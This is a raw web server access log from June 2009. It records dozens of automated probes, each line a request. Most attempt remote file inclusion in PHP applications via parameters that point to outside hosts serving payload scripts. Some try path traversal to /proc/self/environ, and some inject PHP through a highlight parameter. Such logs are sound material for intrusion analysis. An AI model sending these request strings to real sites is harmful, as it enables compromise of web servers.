213.189.2.38 - - [12/Jun/2009:03:06:51 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:06:51 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:06:51 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:03:06:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.229.183.76 - - [12/Jun/2009:03:07:08 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
213.229.183.76 - - [12/Jun/2009:03:07:08 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.229.183.76 - - [12/Jun/2009:03:07:08 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.94.125.100 - - [12/Jun/2009:03:07:22 -0400] "GET /logs/access_log.Q109052900%20%20/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:07:23 -0400] "GET /logs/access_log.Q109051600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.37.11 - - [12/Jun/2009:03:07:56 -0400] "GET /logs/access_log.Q109050900%20%20//inc/tell_a_friend.inc.php?script_root=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.37.11 - - [12/Jun/2009:03:07:56 -0400] "GET //inc/tell_a_friend.inc.php?script_root=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.214.37.11 - - [12/Jun/2009:03:07:56 -0400] "GET /logs//inc/tell_a_friend.inc.php?script_root=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.214.37.11 - - [12/Jun/2009:03:08:31 -0400] "GET /logs/access_log.Q109050900//inc/tell_a_friend.inc.php?script_root=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:03:08:48 -0400] "GET /logs/access_log.Q109052200//tools/send_reminders.php?noSet=0&includedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:03:08:48 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:03:08:48 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:03:10:31 -0400] "GET /images/items/Thumbs.db HTTP/1.1" 200 1317376 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /logs/access_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 252 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 257 "-" "XXXXXX"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /logs/access_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 279 "-" "XXXXXX"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 252 "-" "XXXXXX"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 257 "-" "XXXXXX"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /logs/access_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 279 "-" "XXXXXX"
207.210.89.18 - - [12/Jun/2009:03:10:52 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "XXXXXX"
64.6.15.41 - - [12/Jun/2009:03:11:11 -0400] "GET //com_simpleboard/image_upload.php?sbp=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:03:11:11 -0400] "GET /logs//com_simpleboard/image_upload.php?sbp=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:03:11:11 -0400] "GET /logs/access_log.Q109052400//com_simpleboard/image_upload.php?sbp=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:11:28 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:03:11:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.106.242.122 - - [12/Jun/2009:03:11:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"
85.106.242.122 - - [12/Jun/2009:03:11:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"
85.106.242.122 - - [12/Jun/2009:03:12:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"
85.106.242.122 - - [12/Jun/2009:03:12:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"
75.145.152.113 - - [12/Jun/2009:03:12:08 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:03:12:08 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:03:12:08 -0400] "GET /logs/access_log.Q109052900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:03:12:18 -0400] "GET /images/fav_r-a.gif HTTP/1.1" 200 272 "-" "Googlebot-Image/1.0"
213.229.183.76 - - [12/Jun/2009:03:12:44 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:03:13:30 -0400] "GET /logs/access_log.Q109052400%20%20//com_simpleboard/image_upload.php?sbp=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:03:14:09 -0400] "GET /logs/access_log.Q109052500%20%20//com_simpleboard/image_upload.php?sbp=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:03:14:11 -0400] "GET /logs/access_log.Q109060800//bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.203.180.144 - - [12/Jun/2009:03:14:12 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://kb27.co.kr/bbs///rfi.txt?%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
211.203.180.144 - - [12/Jun/2009:03:14:12 -0400] "GET ///vwar/backup/errors.php?error=http://kb27.co.kr/bbs///rfi.txt?%0D?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
211.203.180.144 - - [12/Jun/2009:03:14:12 -0400] "GET /logs///vwar/backup/errors.php?error=http://kb27.co.kr/bbs///rfi.txt?%0D?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
74.54.32.201 - - [12/Jun/2009:03:14:16 -0400] "GET /logs/access_log.Q109052100//bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:03:14:18 -0400] "GET /logs/access_log.Q109052900%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
213.149.105.23 - - [12/Jun/2009:03:14:20 -0400] "GET /logs/index.php?stranica=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
213.149.105.23 - - [12/Jun/2009:03:14:20 -0400] "GET /logs/access_log.Q109051600/index.php?stranica=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
213.149.105.23 - - [12/Jun/2009:03:14:20 -0400] "GET /index.php?stranica=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
213.149.105.23 - - [12/Jun/2009:03:14:20 -0400] "GET /logs/error_log.Q109041300/index.php?stranica=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
213.229.183.76 - - [12/Jun/2009:03:14:22 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:03:14:24 -0400] "GET /logs/access_log.Q109053000%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:03:14:38 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:14:38 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:14:38 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:14:39 -0400] "GET //modules/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:14:39 -0400] "GET //modules/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:14:39 -0400] "GET //modules/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:14:39 -0400] "GET /logs//modules/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:14:39 -0400] "GET /logs//modules/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:14:39 -0400] "GET /logs//modules/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.814"
195.34.78.110 - - [12/Jun/2009:03:14:56 -0400] "GET /logs/access_log.Q109051600%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.203.180.144 - - [12/Jun/2009:03:14:59 -0400] "GET /logs/access_log.Q109060800///vwar/backup/errors.php?error=http://kb27.co.kr/bbs///rfi.txt?%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
66.249.71.54 - - [12/Jun/2009:03:15:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006559449A312500D4CE01I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:03:15:58 -0400] "GET /images/items/EcOm/ HTTP/1.1" 200 2245 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:03:16:24 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:16:24 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:16:24 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:16:29 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:16:29 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:16:29 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
195.34.78.110 - - [12/Jun/2009:03:16:30 -0400] "GET /logs/access_log.Q109052900%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:03:16:31 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:16:31 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:16:31 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
209.59.12.99 - - [12/Jun/2009:03:18:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.121.201.70 - - [12/Jun/2009:03:19:17 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:19:17 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:19:17 -0400] "GET /logs/error_log.Q108061100/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:19:18 -0400] "GET /logs/access_log.Q109053100/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:19:20 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:19:20 -0400] "GET /logs/error_log.Q108061100%20%20/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:19:22 -0400] "GET /logs/access_log.Q109053100%20%20/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:19:25 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.94.125.100 - - [12/Jun/2009:03:19:52 -0400] "GET /logs/access_log.Q109052900/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:20:15 -0400] "GET /logs/error_log.Q108061100%20%20/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.0.146.100 - - [12/Jun/2009:03:20:17 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.146.100 - - [12/Jun/2009:03:20:17 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.146.100 - - [12/Jun/2009:03:20:17 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:20:23 -0400] "GET /logs/access_log.Q109053100%20%20/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:03:20:36 -0400] "GET //index.php?option=com_comprofiler&task=userslist&Itemid=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:03:20:38 -0400] "GET /logs//index.php?option=com_comprofiler&task=userslist&Itemid=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:03:20:38 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_comprofiler&task=userslist&Itemid=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:03:20:38 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:20:42 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:03:20:44 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
89.223.3.98 - - [12/Jun/2009:03:20:59 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:03:20:59 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:03:20:59 -0400] "GET /logs/access_log.Q109052700%20%20/components/com_forum/download.php?phpbb_root_path=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:03:21:14 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_comprofiler&task=userslist&Itemid=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.49.29 - - [12/Jun/2009:03:21:26 -0400] "GET //?mosConfig_absolute_path=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:26 -0400] "GET /logs/access_log.Q109051600//?mosConfig_absolute_path=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:26 -0400] "GET /logs/access_log.Q109051100//?mosConfig_absolute_path=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:26 -0400] "GET /logs//?mosConfig_absolute_path=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 200 5175 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:30 -0400] "GET /logs/access_log.Q109051100//?mosConfig_absolute_path=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:30 -0400] "GET //?mosConfig_absolute_path=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:30 -0400] "GET /logs//?mosConfig_absolute_path=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 200 5175 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:30 -0400] "GET /logs/access_log.Q109051600//?mosConfig_absolute_path=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:30 -0400] "GET /logs/access_log.Q109051100//?mosConfig_absolute_path=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:30 -0400] "GET //?mosConfig_absolute_path=http://www.eann.kr//idi.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:30 -0400] "GET /logs//?mosConfig_absolute_path=http://www.eann.kr//idi.txt??? HTTP/1.1" 200 5175 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:21:30 -0400] "GET /logs/access_log.Q109051600//?mosConfig_absolute_path=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
116.121.201.70 - - [12/Jun/2009:03:22:22 -0400] "GET /logs/error_log.Q108061100/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:03:22:41 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://208.98.22.241/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jun/2009:03:22:41 -0400] "GET //galeria.php?start=0&kategoria=http://208.98.22.241/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jun/2009:03:22:42 -0400] "GET /logs//galeria.php?start=0&kategoria=http://208.98.22.241/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jun/2009:03:22:52 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://208.98.22.241/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
